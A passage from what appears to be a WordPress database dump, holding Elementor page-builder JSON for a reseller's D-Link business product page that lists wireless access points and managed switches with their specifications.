uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7297,3371,'_elementor_version','2.5.14'),(7298,3371,'_elementor_edit_mode','builder'),(7301,3372,'_wp_page_template','template-fullwidth.php'),(7302,3372,'_elementor_template_type','post'),(7303,3372,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"220\",\"right\":\"220\",\"bottom\":\"220\",\"left\":\"220\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"81\",\"right\":\"81\",\"bottom\":\"81\",\"left\":\"81\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7304,3372,'_elementor_version','2.5.14'),(7305,3372,'_elementor_edit_mode','builder'),(7308,3373,'_wp_page_template','template-fullwidth.php'),(7309,3373,'_elementor_template_type','post'),(7310,3373,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business 